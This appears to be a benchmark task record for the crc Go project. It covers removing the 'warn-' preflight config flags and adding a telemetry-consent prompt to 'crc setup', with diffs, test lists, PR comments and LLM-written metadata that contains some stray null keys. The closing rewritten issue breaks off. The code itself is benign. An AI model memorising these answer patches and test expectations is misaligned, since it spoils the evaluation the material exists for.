config.ValidateBool, config.SuccessfullyApplied) } } } diff --git a/pkg/os/linux/release_info.go b/pkg/os/linux/release_info.go index ce9a361af..836a6e8ce 100644 --- a/pkg/os/linux/release_info.go +++ b/pkg/os/linux/release_info.go @@ -92,9 +92,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { logging.Warnf("Warning: got an invalid line error parsing /etc/os-release: %s", err) continue } - if err := release.setIfPossible(key, val); err != nil { - logging.Debug(err) - } + _ = release.setIfPossible(key, val) } return nil }
Remove warn flags from the config `warn-<preflight-check>` is not used in crc context because we are already capturing the checks data as part of debug logs. `skip` is there to skip a check if a user don't want to run a check.
**Title** Simplify pre‑flight configuration by removing warning flags and clean up related logging **Problem** The configuration exposed `warn-<check>` flags that were never used in practice, leading to unnecessary complexity and confusing documentation. Additionally, noisy debug output was generated for non‑critical errors during OS release parsing and telemetry failures. **Root Cause** `warn-` settings were retained in the schema and pre‑flight logic despite the system only handling `skip-` flags, and logging was overly verbose for harmless parsing issues and telemetry upload failures. **Fix / Expected Behavior** - Eliminate all `warn-` configuration options and their handling in pre‑flight checks. - Treat any failing pre‑flight check as a hard error, with skipping still controlled via `skip-` flags. - Update documentation to reflect that only `skip-` flags are supported. - Reduce log noise by emitting debug‑level messages for telemetry upload problems and silently ignoring non‑critical OS release parsing errors. - Preserve existing functionality for skipping checks and for successful pre‑flight execution. **Risk & Validation** - Users who previously relied on `warn-` flags may see stricter behavior; verify that core workflows (start, setup) still succeed when appropriate `skip-` flags are used. - Ensure the configuration schema no longer lists warning options and that `config --list` output reflects this change. - Run the pre‑flight test suite and OS release parsing tests to confirm that errors are still reported correctly while unnecessary logs are suppressed.
1,816
code-ready/crc
diff --git a/pkg/crc/preflight/preflight_darwin_test.go b/pkg/crc/preflight/preflight_darwin_test.go index 9b0b840c6..5f94d8c75 100644 --- a/pkg/crc/preflight/preflight_darwin_test.go +++ b/pkg/crc/preflight/preflight_darwin_test.go @@ -12,7 +12,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 18) + assert.Len(t, cfg.AllConfigs(), 9) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/preflight/preflight_linux_test.go b/pkg/crc/preflight/preflight_linux_test.go index c0cd327ac..3b9e22649 100644 --- a/pkg/crc/preflight/preflight_linux_test.go +++ b/pkg/crc/preflight/preflight_linux_test.go @@ -21,7 +21,7 @@ func TestCountConfigurationOptions(t *testing.T) { var preflightChecksCount int for _, check := range getAllPreflightChecks() { if check.configKeySuffix != "" { - preflightChecksCount += 2 + preflightChecksCount++ } } assert.True(t, options == preflightChecksCount, "Unexpected number of preflight configuration flags, got %d, expected %d", options, preflightChecksCount) diff --git a/pkg/crc/preflight/preflight_test.go b/pkg/crc/preflight/preflight_test.go index 47726a8b0..c624566ca 100644 --- a/pkg/crc/preflight/preflight_test.go +++ b/pkg/crc/preflight/preflight_test.go @@ -39,18 +39,6 @@ func TestFixPreflight(t *testing.T) { assert.True(t, calls.fixed) } -func TestWarnPreflight(t *testing.T) { - check, calls := sampleCheck(errors.New("check failed"), errors.New("fix failed")) - cfg := config.New(config.NewEmptyInMemoryStorage()) - doRegisterSettings(cfg, []Check{*check}) - _, err := cfg.Set("warn-sample", true) - assert.NoError(t, err) - - assert.NoError(t, doFixPreflightChecks(cfg, []Check{*check})) - assert.True(t, calls.checked) - assert.True(t, calls.fixed) -} - func sampleCheck(checkErr, fixErr error) (*Check, *status) { status := &status{} return &Check{ diff --git a/pkg/crc/preflight/preflight_windows_test.go b/pkg/crc/preflight/preflight_windows_test.go index b9e84e819..ac08d4bda 100644 --- a/pkg/crc/preflight/preflight_windows_test.go +++ b/pkg/crc/preflight/preflight_windows_test.go @@ -11,7 +11,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 24) + assert.Len(t, cfg.AllConfigs(), 12) } func TestCountPreflights(t *testing.T) { diff --git a/test/integration/features/config.feature b/test/integration/features/config.feature index dd323b76c..8ce0c47b3 100644 --- a/test/integration/features/config.feature +++ b/test/integration/features/config.feature @@ -56,55 +56,6 @@ Feature: Test configuration settings When unsetting config property "disable-update-check" succeeds Then "JSON" config file "crc.json" in CRC home folder does not contain key "disable-update-check" - # WARNINGS - - Scenario Outline: CRC config checks (warnings) - When setting config property "<property>" to value "<value1>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value1>" - When setting config property "<property>" to value "<value2>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value2>" - When unsetting config property "<property>" succeeds - Then "JSON" config file "crc.json" in CRC home folder does not contain key "<property>" - - @darwin - Examples: Config warnings on Mac - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-hosts-file-permissions | true | false | - | warn-check-hyperkit-driver | true | false | - | warn-check-hyperkit-installed | true | false | - | warn-check-resolver-file-permissions | true | false | - | warn-check-root-user | true | false | - - @linux - Examples: Config warnings on Linux - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-crc-dnsmasq-file | true | false | - | warn-check-crc-network | true | false | - | warn-check-crc-network-active | true | false | - | warn-check-kvm-enabled | true | false | - | warn-check-libvirt-driver | true | false | - | warn-check-libvirt-installed | true | false | - | warn-check-libvirt-running | true | false | - | warn-check-libvirt-version | true | false | - | warn-check-network-manager-config | true | false | - | warn-check-network-manager-installed | true | false | - | warn-check-network-manager-running | true | false | - | warn-check-root-user | true | false | - | warn-check-user-in-libvirt-group | true | false | - | warn-check-virt-enabled | true | false | - - @windows - Examples: Config warnings on Windows - | property | value1 | value2 | - | warn-check-administrator-user | true | false | - | warn-check-bundle-extracted | true | false | - | warn-check-hyperv-installed | true | false | - | warn-check-hyperv-switch | true | false | - | warn-check-user-in-hyperv-group | true | false | - | warn-check-windows-version | true | false | - # SKIP Scenario Outline: CRC config checks (skips)
[ "TestCountConfigurationOptions" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 5, "num_modified_lines": 11, "pr_author": "praveenkumar", "pr_labels": [ "approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.95, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to drop all \"warn-\" preflight configuration flags because they are unused, keeping only the \"skip-\" flags. The provided test patch updates the expected number of configuration options and removes warning‑related tests, matching the requested behavior. No test assertions introduce requirements beyond the issue description, and there are no signals of external dependencies, implicit naming, or ambiguous specifications, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
30f676113cb292d62ba6b9dd1aa7b1ec406b8c0d
2021-01-05 19:46:12
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1818#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> jsliacan: What's the idea of `-f` with `setup`? To avoid getting the prompt? guillaumerose: Yes, avoid the prompt when crc is used in a script on in a CI. There is a condition to detect if the session is interactive or not, but the user can still force it. gorkem: +1 to adding the instructions for turning off. We also need to refer to the privacy statement[1] FYI @sspeiche [1] https://developers.redhat.com/article/tool-data-collection gbraad: > There is a condition to detect if the session is interactive or not, but the user can still force it. This has a side-effect of 'forcing' false or true ... or ignoring the no-value state. understandable for the non-interactive flow. but this sounds almost like the `skip-all` for the preflights as this has other side-effects when used. openshift-ci[bot]: @guillaumerose: The following test **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/images | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-images/1346731803766951936) | `/test images` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1818). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report --> openshift-ci[bot]: @guillaumerose: The following tests **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/images | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-images/1346731803766951936) | `/test images` ci/prow/e2e-crc | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-e2e-crc/1346731803733397504) | `/test e2e-crc` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1818). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report -->
code-ready__crc-1818
diff --git a/cmd/crc-embedder/cmd/extract.go b/cmd/crc-embedder/cmd/extract.go index e99ce853f..f0cab79ed 100644 --- a/cmd/crc-embedder/cmd/extract.go +++ b/cmd/crc-embedder/cmd/extract.go @@ -1,10 +1,10 @@ package cmd import ( + "fmt" + "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/embed" - "github.com/spf13/cobra" ) @@ -32,5 +32,5 @@ func runExtract(args []string) { if err != nil { logging.Fatalf("Could not extract data embedded in %s: %v", executablePath, err) } - output.Outf("Successfully copied embedded '%s' from %s to %s: %v", embedName, executablePath, destFile, err) + fmt.Printf("Successfully copied embedded '%s' from %s to %s: %v", embedName, executablePath, destFile, err) } diff --git a/cmd/crc-embedder/cmd/list.go b/cmd/crc-embedder/cmd/list.go index 3fe8d6d1a..9ab0c52bb 100644 --- a/cmd/crc-embedder/cmd/list.go +++ b/cmd/crc-embedder/cmd/list.go @@ -1,10 +1,10 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" + "fmt" "github.com/YourFin/binappend" + "github.com/code-ready/crc/pkg/crc/logging" "github.com/spf13/cobra" ) @@ -30,8 +30,8 @@ func runList(args []string) { if err != nil { logging.Fatalf("Could not access data embedded in %s: %v", executablePath, err) } - output.Outf("Data files embedded in %s:\n", executablePath) + fmt.Printf("Data files embedded in %s:\n", executablePath) for _, name := range extractor.AvalibleData() { - output.Outln("\t", name) + fmt.Println("\t", name) } } diff --git a/cmd/crc-embedder/cmd/root.go b/cmd/crc-embedder/cmd/root.go index a062cd816..eb00a0634 100644 --- a/cmd/crc-embedder/cmd/root.go +++ b/cmd/crc-embedder/cmd/root.go @@ -1,10 +1,10 @@ package cmd import ( + "fmt" + "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" - "github.com/spf13/cobra" ) @@ -41,8 +41,8 @@ func runPrerun() { } func runRoot() { - output.Outln("No command given") - output.Outln("") + fmt.Println("No command given") + fmt.Println("") } func runPostrun() { diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 4aa2e4cdb..d3ba19a85 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -48,7 +48,7 @@ func RegisterSettings(cfg *config.Config) { cfg.AddSetting(EnableClusterMonitoring, false, config.ValidateBool, config.SuccessfullyApplied) // Telemeter Configuration - cfg.AddSetting(ConsentTelemetry, false, config.ValidateBool, config.SuccessfullyApplied) + cfg.AddSetting(ConsentTelemetry, "", config.ValidateYesNo, config.SuccessfullyApplied) } func isPreflightKey(key string) bool { diff --git a/cmd/crc/cmd/config/get.go b/cmd/crc/cmd/config/get.go index 2a6cb92f7..9f694eb79 100644 --- a/cmd/crc/cmd/config/get.go +++ b/cmd/crc/cmd/config/get.go @@ -5,7 +5,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -26,7 +25,7 @@ func configGetCmd(config config.Storage) *cobra.Command { case v.IsDefault: return fmt.Errorf("Configuration property '%s' is not set. Default value is '%s'", key, v.AsString()) default: - output.Outln(key, ":", v.AsString()) + fmt.Println(key, ":", v.AsString()) } return nil }, diff --git a/cmd/crc/cmd/config/set.go b/cmd/crc/cmd/config/set.go index f6b356b20..0afc89d54 100644 --- a/cmd/crc/cmd/config/set.go +++ b/cmd/crc/cmd/config/set.go @@ -2,9 +2,9 @@ package config import ( "errors" + "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -23,7 +23,7 @@ func configSetCmd(config config.Storage) *cobra.Command { } if setMessage != "" { - output.Outln(setMessage) + fmt.Println(setMessage) } return nil }, diff --git a/cmd/crc/cmd/config/unset.go b/cmd/crc/cmd/config/unset.go index cfbe6484b..222c20595 100644 --- a/cmd/crc/cmd/config/unset.go +++ b/cmd/crc/cmd/config/unset.go @@ -2,9 +2,9 @@ package config import ( "errors" + "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -22,7 +22,7 @@ func configUnsetCmd(config config.Storage) *cobra.Command { return err } if unsetMessage != "" { - output.Outln(unsetMessage) + fmt.Println(unsetMessage) } return nil }, diff --git a/cmd/crc/cmd/ip.go b/cmd/crc/cmd/ip.go index 576178ac0..477040f60 100644 --- a/cmd/crc/cmd/ip.go +++ b/cmd/crc/cmd/ip.go @@ -1,7 +1,8 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/output" + "fmt" + "github.com/spf13/cobra" ) @@ -28,6 +29,6 @@ func runIP(arguments []string) error { if err != nil { return err } - output.Outln(ip) + fmt.Println(ip) return nil } diff --git a/cmd/crc/cmd/oc_env.go b/cmd/crc/cmd/oc_env.go index 09495bf92..b9ae212df 100644 --- a/cmd/crc/cmd/oc_env.go +++ b/cmd/crc/cmd/oc_env.go @@ -4,7 +4,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" ) @@ -34,13 +33,13 @@ func runOcEnv(args []string) error { return err } proxyConfig := consoleResult.ClusterConfig.ProxyConfig - output.Outln(shell.GetPathEnvString(userShell, constants.CrcOcBinDir)) + fmt.Println(shell.GetPathEnvString(userShell, constants.CrcOcBinDir)) if proxyConfig.IsEnabled() { - output.Outln(shell.GetEnvString(userShell, "HTTP_PROXY", proxyConfig.HTTPProxy)) - output.Outln(shell.GetEnvString(userShell, "HTTPS_PROXY", proxyConfig.HTTPSProxy)) - output.Outln(shell.GetEnvString(userShell, "NO_PROXY", proxyConfig.GetNoProxyString())) + fmt.Println(shell.GetEnvString(userShell, "HTTP_PROXY", proxyConfig.HTTPProxy)) + fmt.Println(shell.GetEnvString(userShell, "HTTPS_PROXY", proxyConfig.HTTPSProxy)) + fmt.Println(shell.GetEnvString(userShell, "NO_PROXY", proxyConfig.GetNoProxyString())) } - output.Outln(shell.GenerateUsageHint(userShell, "crc oc-env")) + fmt.Println(shell.GenerateUsageHint(userShell, "crc oc-env")) return nil } diff --git a/cmd/crc/cmd/podman_env.go b/cmd/crc/cmd/podman_env.go index ad37ea0f4..2a2014b07 100644 --- a/cmd/crc/cmd/podman_env.go +++ b/cmd/crc/cmd/podman_env.go @@ -5,7 +5,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" ) @@ -36,12 +35,12 @@ func RunPodmanEnv(args []string) error { return err } - output.Outln(shell.GetPathEnvString(userShell, constants.CrcBinDir)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_USER", constants.DefaultSSHUser)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_HOST", ip)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_IDENTITY_FILE", constants.GetPrivateKeyPath())) - output.Outln(shell.GetEnvString(userShell, "PODMAN_IGNORE_HOSTS", "1")) - output.Outln(shell.GenerateUsageHint(userShell, "crc podman-env")) + fmt.Println(shell.GetPathEnvString(userShell, constants.CrcBinDir)) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_USER", constants.DefaultSSHUser)) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_HOST", ip)) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_IDENTITY_FILE", constants.GetPrivateKeyPath())) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_IGNORE_HOSTS", "1")) + fmt.Println(shell.GenerateUsageHint(userShell, "crc podman-env")) return nil } diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 1c2b96adf..4c360a139 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -13,7 +13,6 @@ import ( "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/code-ready/crc/pkg/crc/segment" "github.com/spf13/cobra" @@ -80,7 +79,7 @@ func runPostrun() { } func runRoot() { - output.Outln("No command given") + fmt.Println("No command given") } func Execute() { diff --git a/cmd/crc/cmd/setup.go b/cmd/crc/cmd/setup.go index d8b5ace93..e0e3946d1 100644 --- a/cmd/crc/cmd/setup.go +++ b/cmd/crc/cmd/setup.go @@ -8,6 +8,7 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/constants" + "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -31,6 +32,20 @@ var setupCmd = &cobra.Command{ } func runSetup(arguments []string) error { + if config.Get(cmdConfig.ConsentTelemetry).AsString() == "" { + fmt.Println("CodeReady Containers is constantly improving and we would like to know more about usage!") + if input.PromptUserForYesOrNo("Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)", false) { + if _, err := config.Set(cmdConfig.ConsentTelemetry, "yes"); err != nil { + return err + } + fmt.Printf("Thanks for helping us! You can disable telemetry with the command 'crc config set %s no'.\n", cmdConfig.ConsentTelemetry) + } else { + if _, err := config.Set(cmdConfig.ConsentTelemetry, "no"); err != nil { + return err + } + fmt.Printf("No worry, you can still enable telemetry manually with the command 'crc config set %s yes'.\n", cmdConfig.ConsentTelemetry) + } + } err := preflight.SetupHost(config) return render(&setupResult{ Success: err == nil, diff --git a/pkg/crc/config/config.go b/pkg/crc/config/config.go index 7cd3cf121..0fe0f538d 100644 --- a/pkg/crc/config/config.go +++ b/pkg/crc/config/config.go @@ -9,7 +9,7 @@ import ( const ( configPropDoesntExistMsg = "Configuration property '%s' does not exist" - invalidProp = "Value '%s' for configuration property '%s' is invalid, reason: %s" + invalidProp = "Value '%v' for configuration property '%s' is invalid, reason: %s" ) type Config struct { diff --git a/pkg/crc/config/validations.go b/pkg/crc/config/validations.go index 634c21fe1..5ce5bd6bb 100644 --- a/pkg/crc/config/validations.go +++ b/pkg/crc/config/validations.go @@ -95,3 +95,10 @@ func ValidateNoProxy(value interface{}) (bool, string) { } return true, "" } + +func ValidateYesNo(value interface{}) (bool, string) { + if cast.ToString(value) == "yes" || cast.ToString(value) == "no" { + return true, "" + } + return false, "must be yes or no" +} diff --git a/pkg/crc/input/input.go b/pkg/crc/input/input.go index be5086102..7f77c8729 100644 --- a/pkg/crc/input/input.go +++ b/pkg/crc/input/input.go @@ -6,7 +6,6 @@ import ( "os" "strings" - "github.com/code-ready/crc/pkg/crc/output" terminal "golang.org/x/term" survey "gopkg.in/AlecAivazis/survey.v1" ) @@ -19,7 +18,7 @@ func PromptUserForYesOrNo(message string, force bool) bool { return false } var response string - output.Outf(message + "? [y/N]: ") + fmt.Printf(message + "? [y/N]: ") fmt.Scanf("%s", &response) return strings.ToLower(response) == "y" diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index ad4b6b641..545c51c18 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,7 +23,6 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" - "github.com/code-ready/crc/pkg/crc/systemd/states" crcos "github.com/code-ready/crc/pkg/os" "github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" @@ -350,12 +349,6 @@ func (client *client) Start(startConfig StartConfig) (*StartResult, error) { } } - // Check if kubelet service is running inside the VM - kubeletStatus, err := sd.Status("kubelet") - if err != nil || kubeletStatus != states.Running { - return nil, errors.Wrap(err, "kubelet service is not running") - } - // In Openshift 4.3, when cluster comes up, the following happens // 1. After the openshift-apiserver pod is started, its log contains multiple occurrences of `certificate has expired or is not yet valid` // 2. Initially there is no request-header's client-ca crt available to `extension-apiserver-authentication` configmap diff --git a/pkg/crc/output/output.go b/pkg/crc/output/output.go deleted file mode 100644 index 80b50f461..000000000 --- a/pkg/crc/output/output.go +++ /dev/null @@ -1,18 +0,0 @@ -package output - -import ( - "fmt" - "io" -) - -func Outln(args ...interface{}) { - fmt.Println(args...) -} - -func Outf(s string, args ...interface{}) { - fmt.Printf(s, args...) -} - -func Fout(w io.Writer, args ...interface{}) (n int, err error) { - return fmt.Fprintln(w, args...) -} diff --git a/pkg/crc/preflight/preflight_checks_tray_darwin.go b/pkg/crc/preflight/preflight_checks_tray_darwin.go index 05961eee0..ee31ee2fd 100644 --- a/pkg/crc/preflight/preflight_checks_tray_darwin.go +++ b/pkg/crc/preflight/preflight_checks_tray_darwin.go @@ -195,7 +195,9 @@ func downloadOrExtractTrayApp() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCMacTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCMacTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -204,15 +206,14 @@ func downloadOrExtractTrayApp() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCMacTrayDownloadURL())) outputPath := constants.CrcBinDir err = goos.MkdirAll(outputPath, 0750) if err != nil { return errors.Wrap(err, "Cannot create the target directory.") } - _, err = extract.Uncompress(archivePath, outputPath, false) + _, err = extract.Uncompress(trayDestFileName, outputPath, false) if err != nil { - return errors.Wrapf(err, "Cannot uncompress '%s'", archivePath) + return errors.Wrapf(err, "Cannot uncompress '%s'", trayDestFileName) } return nil } diff --git a/pkg/crc/preflight/preflight_checks_tray_windows.go b/pkg/crc/preflight/preflight_checks_tray_windows.go index 501984608..d2493018d 100644 --- a/pkg/crc/preflight/preflight_checks_tray_windows.go +++ b/pkg/crc/preflight/preflight_checks_tray_windows.go @@ -161,7 +161,9 @@ func fixTrayExecutableExists() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCWindowsTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCWindowsTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -170,10 +172,9 @@ func fixTrayExecutableExists() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCWindowsTrayDownloadURL())) - _, err = extract.Uncompress(archivePath, constants.TrayExecutableDir, false) + _, err = extract.Uncompress(trayDestFileName, constants.TrayExecutableDir, false) if err != nil { - return fmt.Errorf("Cannot uncompress '%s': %v", archivePath, err) + return fmt.Errorf("Cannot uncompress '%s': %v", trayDestFileName, err) } return nil diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index e9ac423c4..f81d6131c 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -56,7 +56,7 @@ func (c *Client) Close() error { } func (c *Client) Upload(action string, duration time.Duration, err error) error { - if !c.config.Get(config.ConsentTelemetry).AsBool() { + if c.config.Get(config.ConsentTelemetry).AsString() != "yes" { return nil }
Ask the user to turn on telemetry when running crc setup ``` $ crc setup CodeReady Containers is constantly improving and we would like to know more about usage! Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)? [y/N]: y Thanks for helping us! You can disable telemetry with the command 'crc config set consent-telemetry no'. ... $ crc setup CodeReady Containers is constantly improving and we would like to know more about usage! Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)? [y/N]: No worry, you can still enable telemetry manually with the command 'crc config set consent-telemetry yes'. ... ```
**Title** Enable telemetry consent prompting and clean up console output handling **Problem** The `crc setup` command never asked users for telemetry consent, and the telemetry configuration was stored as a boolean while the rest of the code treated it as a string. Additionally, the custom output helper was removed from many commands, leading to inconsistent messaging and compilation issues. **Root Cause** Telemetry setting type and validation were mismatched, and the code base still referenced the old output abstraction after its removal. **Fix / Expected Behavior** - Introduce a “yes/no” validated telemetry setting and default it to an unset state. - Prompt users during `crc setup` to opt‑in or opt‑out of telemetry, persisting the choice. - Adjust telemetry upload logic to respect the new string‑based consent value. - Replace the removed output helper with standard formatted printing across all CLI commands. - Correct embed extraction paths for tray components on macOS and Windows to avoid path errors. - Add a small input utility for consistent yes/no prompting. **Risk & Validation** - Verify that existing 